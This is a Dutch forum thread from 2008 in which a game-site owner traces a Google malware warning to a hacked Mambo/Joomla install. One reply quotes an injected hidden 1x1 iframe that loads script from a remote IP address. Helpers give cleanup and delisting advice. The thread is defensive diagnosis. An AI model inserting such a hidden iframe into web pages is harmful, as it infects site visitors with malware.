Badware melding van Google - Softwareontwikkeling

donderdag 17 juli 2008 15:09

Acties:

Topicstarter

Ik draai al meer dan een jaar een spellensite.Je moet er registreren zodat je scores worden opgeslagen.
De spelletjes zijn flash bestanden.
Op de frontpage zit o.a een shoutbox en ik gebruik voor mijn statistieken Statcounter.

Maar sinds vandaag krijg ik van Google de melding dat mijn site een bedreiging vormt.
Als ik met FF naar de site ga dan komt er een waarschuwing in beeld ipv de site.
Verder kreeg ik een mailtje van Google met de mededeling dat de gebruikers van mijn site geïnfecteerd kunnen worden met schadelijke software.

Ik zou dus niet weten wat deze melding veroorzaakt? Ik denk dat het de statcounter is?
Mijn vraag is hoe kom ik daar achter?

donderdag 17 juli 2008 15:16

Acties:

moozzuzz

Door de counter er af te halen en dan te zien of je nog steeds dezelfde melding krijgt? Welke andere externe resources komen nog op je site?

donderdag 17 juli 2008 15:23

Acties:

Artwido

Topicstarter

moozzuzz schreef op donderdag 17 juli 2008 @ 15:16:
Door de counter er af te halen en dan te zien of je nog steeds dezelfde melding krijgt? Welke andere externe resources komen nog op je site?

Die melding gaat er niet automatisch af. Ik moet Google verzoeken.
En zover ik weet is de statcounter de enige externe resource.

donderdag 17 juli 2008 15:23

Acties:

McKaamos

Master of the Edit-button

check de broncode van je pagina eens vanuit de browser. Staan er toevallig onzichtbare iFrames in oid die andere pagina's includen?
Dikke kans dat je site dan een vulnerability heeft die ge-exploit is.

Het gaat om de spellenwebsite uit je sig toch?
Mambo/Joomla site zie ik, en de bron van de frontpagina gaf dit:

HTML:

1	<iframe src=http://61.155.8.157/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe>

Opvragen van de URL geeft een stukje URL encoded javascript dat ge-execute moet worden schijnbaar...

Ik heb even een tacert gedaan op het IP. Lijkt gehost te worden op een lijntje achter een NTT Communications (chinese ISP) verbinding.

edit:
haal de link maar even uit je sig, zodat niet iedereen er heen gaat en infected raakt.

[ Voor 62% gewijzigd door McKaamos op 17-07-2008 15:57 ]

Iemand een Tina2 in de aanbieding?

donderdag 17 juli 2008 15:25

Acties:

BtM909

Watch out Guys...

Als ik met FF naar de site ga dan komt er een waarschuwing in beeld ipv de site.

Geef eens een printscreen

Ace of Base vs Charli XCX - All That She Boom Claps (RMT) | Clean Bandit vs Galantis - I'd Rather Be You (RMT)
You've moved up on my notch-list. You have 1 notch
I have a black belt in Kung Flu.

donderdag 17 juli 2008 15:36

Acties:

Joolee

BtM909 schreef op donderdag 17 juli 2008 @ 15:25:
[...]

Geef eens een printscreen

klik

donderdag 17 juli 2008 15:51

Acties:

Artwido

Topicstarter

Ik zie nu op het Joomla forum dat er meer er last van hebben.
klik

donderdag 17 juli 2008 15:52

Acties:

Bosmonster

*zucht*

http://safebrowsing.clien...te=http://www.arturius.nl

[ Voor 12% gewijzigd door Bosmonster op 17-07-2008 15:53 ]

donderdag 17 juli 2008 16:50

Acties:

Artwido

Topicstarter

Ik heb de boosdoener gevonden.
Er was een module genaamd mambo info geïnstalleerd. (oftewel de site is gehacked)

vrijdag 18 juli 2008 00:24

Acties:

Juup

Wow. Wel cool van google dat ze je een mailtje met info hierover gestuurd hebben.

Een wappie is iemand die gevallen is voor de (jarenlange) Russische desinformatiecampagnes.
Wantrouwen en confirmation bias doen de rest.

vrijdag 18 juli 2008 07:17

Acties:

McKaamos

Master of the Edit-button

Wie heeft het over mail? Je krijgt juist een melding als je via Google de website opzoekt.

Iemand een Tina2 in de aanbieding?

vrijdag 18 juli 2008 07:56

Acties:

Pete

McKaamos schreef op vrijdag 18 juli 2008 @ 07:17:
Wie heeft het over mail? Je krijgt juist een melding als je via Google de website opzoekt.

Artwido schreef op donderdag 17 juli 2008 @ 15:09:
...
Verder kreeg ik een mailtje van Google met de mededeling dat de gebruikers van mijn site geïnfecteerd kunnen worden met schadelijke software.
...

petersmit.eu

vrijdag 18 juli 2008 08:32

Acties:

McKaamos

Master of the Edit-button

phsmit schreef op vrijdag 18 juli 2008 @ 07:56:
[...]

[...]

ah ok, niet goed gelezen. sorry!

Iemand een Tina2 in de aanbieding?

vrijdag 18 juli 2008 13:46

Acties:

Tsjilp

RS[I]ds

Ik heb het laatst ook op m'n blog gehad (wordpress). Alles updaten naar de laatste versie, wachtwoord wijzigen en alle posts langsgaan en checken op dubieuze code (zoals dat iframe). Daarna google verzoeken om weer toegelaten te worden, bij mij duurde dat ongeveer 6 weken.

Raar... Is zo gek nog niet

vrijdag 18 juli 2008 14:41

Acties:

Artwido

Topicstarter

Tsjilp schreef op vrijdag 18 juli 2008 @ 13:46:
Ik heb het laatst ook op m'n blog gehad (wordpress). Alles updaten naar de laatste versie, wachtwoord wijzigen en alle posts langsgaan en checken op dubieuze code (zoals dat iframe). Daarna google verzoeken om weer toegelaten te worden, bij mij duurde dat ongeveer 6 weken.

6 weken... dat is behoorlijk lang.
Ik ga het weekend ook alles updaten.
Dit soort geintjes kost weer allemaal een hoop verloren tijd en energie.

vrijdag 18 juli 2008 16:19

Acties:

Artwido

Topicstarter

Ze hebben de melding bij Google weggehaald.

Dus 6 weken hoeft niet.

[ Voor 7% gewijzigd door Artwido op 18-07-2008 16:19 ]

Pagina: 1

Reageer